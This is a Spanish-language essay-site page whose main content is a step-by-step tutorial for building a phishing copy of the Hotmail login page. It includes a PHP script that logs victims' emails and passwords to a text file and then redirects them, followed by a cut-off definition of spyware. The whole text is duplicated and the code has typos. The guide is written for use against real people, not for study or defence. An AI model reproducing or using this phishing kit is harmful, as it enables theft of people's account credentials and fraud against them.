El Ser Excelente
Páginas: 7 (1677 palabras)
Publicado: 23 de noviembre de 2012
PHISHING
1.- una copia de la pagina a realizar phishing ;)
2.- nuestro editor de texto favorito, el mío sera gedit :P
3.- script en php para la transferencia del password y login a un archivo :D
ok, ya sabiendo que necesitamos, pues empecemos
para empezar necesitamos una copia de dicha pagina para ello me enfocare en este manual es la pagina de hotmail ;), ok, entramos ahttp://hotmail.com
dentro nos vamos en la barra de menu de nuestro explorador, en mi caso firefox
( Archivo>guardar pagina como ) y lo guardamos como pagina completa
esto nos dara como resultado una carpeta con el contenido de la pagina, así como las imagenes que usa y los script que necesita para funcionar, luego ya teniendo esto la carpeta y el archivo html, ahora nos enfocamos en abrir el archivohtml con gedit y buscamos la etiqueta <"form>, en esta etiqueta añadimos el atributo "actino=" con la dirección del archivo php, dejando algo parecido a esto
<"form action="archivo.php">
luego guardamos, y abrimos el archivo html que salió de la copia de hotmail y vemos que la pagina se repite y no se ve tan creeible -_- eso se debe a un script js que se encuentra la carpeta quesalió de la copia de la pagina de Hotmail, solo la eliminamos ^^, ahora recargamos la pagina y vemos que ya no se repite :D, ah pero el texto de la pagina copia de Hotmail se ve muy raro :S no importa ^^ eso se debe a la codificación de la pagina, eso se arregla con abrir la pagina de nuevo en gedit y decirle que lo guarde con codificación iso-8859-15 o iso-8859-15 o alguna variante del mismo :P, coneso ya tenemos un phishing creible, ah pero aun no funciona :S, para eso necesitamos crear un archivo php ;), ok abrimos nuestro fantastico gedit y enpezamos a codificar esto:
<"?php
$id=$_POST['login'];
$pass=$_POST['passwd'];
$master=hopen('texto.txt',a);
fwrite($master,"
email: ".$id." ...... pass: " .$pass." ");
fclose($master);
echo "<"meta equiv="'Refresh'"content="'1;url=http://prodigy.msn.com/'>";
?>
donde la variable $id almacenara el login es decir el correo de la victima
y donde la variable $pass almacenara el password que la persona introduce en el formulario :D
ya lo demás no falta explicarlo se entiende a simple vista, en resumen se especifica donde se guardara luego se escribe la funcion de escritura en el archivo especificado y al terminarla accion redirecciona a la pagina de prodigy.msn.com
bueno para los que no me entendieron solo modifiquen esta línea :P
$master=fopen('texto.txt',a);
en la parte donde dice texto.txt, por la que quieran, un ejemplo podría ser:
$master=fopen('hackeados.txt',a);
en ese archivo texto es donde se almacenaran las contraseñas y los login en este orden:
email: ...... pass:
unejemplo:
email: pancho@hotmail.com ...... pass: 12345.
bueno ahora solo toca guardar el archivo con la extension php
dejando algo asi:
archivo.php
un ejemplo podria ser
loginsrf.php
claro el archivo php que creamos debe tener el mismo nombre que al que le pusimos en el form dejando el form algo asi
<"form action="loginsrf.php">
ya terminado todo esto juntamos nuestrosarchivos y los subimos a un host, y al fin ya tenemos nuestro phishing funcionando, ah no se les olvide nombrar el archivo html con un nombre creeible al de la pagina de hotmail.
SPYWARE
Los Spywares o archivos espías son unas diminutas aplicaciones cuyo objetivo es el envío de datos del sistema donde están instalados, mediante la utilización subrepticia de la conexión a la red, a un lugarexterior, el cual por lo general resulta ser una empresa de publicidad de Internet. Estas acciones son llevadas a cabo sin el conocimiento del usuario.
El verdadero nombre de estos archivos espías, y procede de "Advertissing Supported Software".
Hay que aclarar que, aunque evidentemente tienen cierta similitud con los programas Troyanos, los Spyware no representan un peligro de manipulación...
1.- una copia de la pagina a realizar phishing ;)
2.- nuestro editor de texto favorito, el mío sera gedit :P
3.- script en php para la transferencia del password y login a un archivo :D
ok, ya sabiendo que necesitamos, pues empecemos
para empezar necesitamos una copia de dicha pagina para ello me enfocare en este manual es la pagina de hotmail ;), ok, entramos ahttp://hotmail.com
dentro nos vamos en la barra de menu de nuestro explorador, en mi caso firefox
( Archivo>guardar pagina como ) y lo guardamos como pagina completa
esto nos dara como resultado una carpeta con el contenido de la pagina, así como las imagenes que usa y los script que necesita para funcionar, luego ya teniendo esto la carpeta y el archivo html, ahora nos enfocamos en abrir el archivohtml con gedit y buscamos la etiqueta <"form>, en esta etiqueta añadimos el atributo "actino=" con la dirección del archivo php, dejando algo parecido a esto
<"form action="archivo.php">
luego guardamos, y abrimos el archivo html que salió de la copia de hotmail y vemos que la pagina se repite y no se ve tan creeible -_- eso se debe a un script js que se encuentra la carpeta quesalió de la copia de la pagina de Hotmail, solo la eliminamos ^^, ahora recargamos la pagina y vemos que ya no se repite :D, ah pero el texto de la pagina copia de Hotmail se ve muy raro :S no importa ^^ eso se debe a la codificación de la pagina, eso se arregla con abrir la pagina de nuevo en gedit y decirle que lo guarde con codificación iso-8859-15 o iso-8859-15 o alguna variante del mismo :P, coneso ya tenemos un phishing creible, ah pero aun no funciona :S, para eso necesitamos crear un archivo php ;), ok abrimos nuestro fantastico gedit y enpezamos a codificar esto:
<"?php
$id=$_POST['login'];
$pass=$_POST['passwd'];
$master=hopen('texto.txt',a);
fwrite($master,"
email: ".$id." ...... pass: " .$pass." ");
fclose($master);
echo "<"meta equiv="'Refresh'"content="'1;url=http://prodigy.msn.com/'>";
?>
donde la variable $id almacenara el login es decir el correo de la victima
y donde la variable $pass almacenara el password que la persona introduce en el formulario :D
ya lo demás no falta explicarlo se entiende a simple vista, en resumen se especifica donde se guardara luego se escribe la funcion de escritura en el archivo especificado y al terminarla accion redirecciona a la pagina de prodigy.msn.com
bueno para los que no me entendieron solo modifiquen esta línea :P
$master=fopen('texto.txt',a);
en la parte donde dice texto.txt, por la que quieran, un ejemplo podría ser:
$master=fopen('hackeados.txt',a);
en ese archivo texto es donde se almacenaran las contraseñas y los login en este orden:
email: ...... pass:
unejemplo:
email: pancho@hotmail.com ...... pass: 12345.
bueno ahora solo toca guardar el archivo con la extension php
dejando algo asi:
archivo.php
un ejemplo podria ser
loginsrf.php
claro el archivo php que creamos debe tener el mismo nombre que al que le pusimos en el form dejando el form algo asi
<"form action="loginsrf.php">
ya terminado todo esto juntamos nuestrosarchivos y los subimos a un host, y al fin ya tenemos nuestro phishing funcionando, ah no se les olvide nombrar el archivo html con un nombre creeible al de la pagina de hotmail.
SPYWARE
Los Spywares o archivos espías son unas diminutas aplicaciones cuyo objetivo es el envío de datos del sistema donde están instalados, mediante la utilización subrepticia de la conexión a la red, a un lugarexterior, el cual por lo general resulta ser una empresa de publicidad de Internet. Estas acciones son llevadas a cabo sin el conocimiento del usuario.
El verdadero nombre de estos archivos espías, y procede de "Advertissing Supported Software".
Hay que aclarar que, aunque evidentemente tienen cierta similitud con los programas Troyanos, los Spyware no representan un peligro de manipulación...
Leer documento completo
Regístrate para leer el documento completo.